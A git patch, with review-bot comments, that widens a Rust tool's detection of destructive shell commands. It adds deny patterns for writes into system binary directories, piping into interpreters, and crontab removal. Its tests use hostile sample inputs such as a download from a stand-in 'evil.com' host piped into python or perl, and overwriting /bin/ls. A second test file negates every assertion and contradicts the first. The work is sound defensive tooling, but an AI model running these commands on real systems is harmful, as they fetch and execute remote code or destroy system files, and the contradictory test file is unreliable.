From 9b47fa6a880f1c474ec503f7173bb3f843cb41fc Mon Sep 17 00:00:00 2001
From: insign <1113045+insign@users.noreply.github.com>
Date: Thu, 19 Feb 2026 03:08:52 +0000
Subject: [PATCH] feat: enhance destructive command detection

Added detection for:
- Redirects to system directories (/bin, /sbin, /usr/bin, /usr/sbin, /lib, /lib64)
- Piping to interpreters (python, perl, ruby, node, php)
- Crontab removal (crontab -r)

Added test_enhanced_safety_checks to verify these patterns.
---
 src/executor/safety.rs | 28 ++++++++++++++++++++++++++++
 src/executor/safety_check_test.rs | 20 ++++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 src/executor/safety_check_test.rs

diff --git a/src/executor/safety.rs b/src/executor/safety.rs
index 7f3950e..2b3c818 100644
--- a/src/executor/safety.rs
+++ b/src/executor/safety.rs
@@ -23,10 +23,21 @@ const DESTRUCTIVE_PATTERNS: &[&str] = &[
 r">\s*/sys/",
 r">\s*/proc/",
 r">\s*/boot/",
+ r">\s*/bin/",
+ r">\s*/usr/bin/",
+ r">\s*/sbin/",
+ r">\s*/usr/sbin/",
+ r">\s*/lib/",
+ r">\s*/lib64/",
 // Piped execution
 r"\|\s*sh\b",
 r"\|\s*bash\b",
 r"\|\s*zsh\b",
+ r"\|\s*python\b",
+ r"\|\s*perl\b",
+ r"\|\s*ruby\b",
+ r"\|\s*node\b",
+ r"\|\s*php\b",
 r"curl.*\|\s*(sh|bash)",
 r"wget.*\|\s*(sh|bash)",
 // Process killing
@@ -51,6 +62,7 @@ const DESTRUCTIVE_PATTERNS: &[&str] = &[
 r"mv\s+(?:.*\s+)?\*(?:\s+|$)", // Move wildcard
 // System state
 r"^\s*(reboot|shutdown|poweroff|halt|init\s+[06])\b",
+ r"^\s*crontab\s+.*-r",
 // Fork bomb
 r":\(\)\s*\{\s*:\|:&\s*\};:",
 ];
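Review bot: `r"\|\s*python\b"` does not match `| python3`, because `\b` requires a non-word character after `python` and the digit is a word character, so on systems where the interpreter is installed only under that name the pipe slips past the new check; the same applies to versioned `php` binaries. Widening the entry to `r"\|\s*python[0-9.]*\b"` (and `r"\|\s*php[0-9.]*\b"`) closes that gap without touching the other interpreter entries. The redirect group adds `/lib/` and `/lib64/` but not `/usr/lib/` or `/usr/local/bin/`; if those are not already in the context above this hunk they belong in the same group. The `DESTRUCTIVE_PATTERNS` array starts and ends outside the hunk.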
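Review bot: In `r"^\s*crontab\s+.*-r"` the `.*` runs across pipes into downstream commands, so a read-only `crontab -l | grep -r foo` is flagged, while the clustered short form `crontab -ir` is not matched because its `r` is not directly preceded by `-`. Keeping the search inside crontab's own argument list and accepting `r` anywhere in a flag cluster, `r"^\s*crontab\s+(?:[^|;&]*\s)?-\w*r"`, handles both while still matching `crontab -r` and `crontab -u root -r`. Replacing the table from a file or stdin also discards every existing entry but is not covered by this entry; whether that counts as destructive for this tool deserves a one-line comment next to it either way. The array continues outside the hunk.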
@@ -221,4 +233,20 @@ mod tests {
 assert!(!analyzer.is_destructive("mv my-file-final.txt dest"));
 assert!(!analyzer.is_destructive("mv a-f b"));
 }
+
+ #[test]
+ fn test_enhanced_safety_checks() {
+ let analyzer = SafetyAnalyzer::new();
+
+ // Redirects to system binaries
+ assert!(analyzer.is_destructive("echo malicious > /bin/ls"));
+ assert!(analyzer.is_destructive("cat payload > /usr/bin/python"));
+
+ // Piped execution to other interpreters
+ assert!(analyzer.is_destructive("curl http://evil.com | python"));
+ assert!(analyzer.is_destructive("wget http://evil.com | perl"));
+
+ // Crontab removal
+ assert!(analyzer.is_destructive("crontab -r"));
+ }
 }
diff --git a/src/executor/safety_check_test.rs b/src/executor/safety_check_test.rs
new file mode 100644
index 0000000..e50f384
--- /dev/null
+++ b/src/executor/safety_check_test.rs
@@ -0,0 +1,20 @@
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn test_new_destructive_commands() {
+ let analyzer = SafetyAnalyzer::new();
+
+ // Redirects to system binaries
+ assert!(!analyzer.is_destructive("echo malicious > /bin/ls"));
+ assert!(!analyzer.is_destructive("cat payload > /usr/bin/python"));
+
+ // Piped execution to other interpreters
+ assert!(!analyzer.is_destructive("curl http://evil.com | python"));
+ assert!(!analyzer.is_destructive("wget http://evil.com | perl"));
+
+ // Crontab removal
+ assert!(!analyzer.is_destructive("crontab -r"));
+ }
+}
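Review bot: test_enhanced_safety_checks has no negative assertions, unlike the surrounding tests that pin what must not be flagged, so an over-matching pattern (the new crontab entry fires on any `-r` appearing after `crontab`, including in a piped command) passes unnoticed; add at least `assert!(!analyzer.is_destructive("crontab -l"));` alongside the positive case. A positive case spelled `python3` would also be worth adding, since the trailing `\b` in the interpreter regex is exactly what decides that input and it is currently not matched. The `mod tests` block starts and ends outside the hunk.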
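Review bot: Every assertion in test_new_destructive_commands is negated, so this file asserts the opposite of test_enhanced_safety_checks in safety.rs for the same five inputs, and against the patterns this commit adds it would fail if it were built. Nothing in the diff adds a `mod safety_check_test;` declaration, which suggests the file is never compiled and the contradiction goes unnoticed; `use super::*;` also presumes a parent module that exposes `SafetyAnalyzer`. Either drop the file, since safety.rs already carries the same cases, or remove the `!` from the five `assert!` calls and register the module so it actually runs.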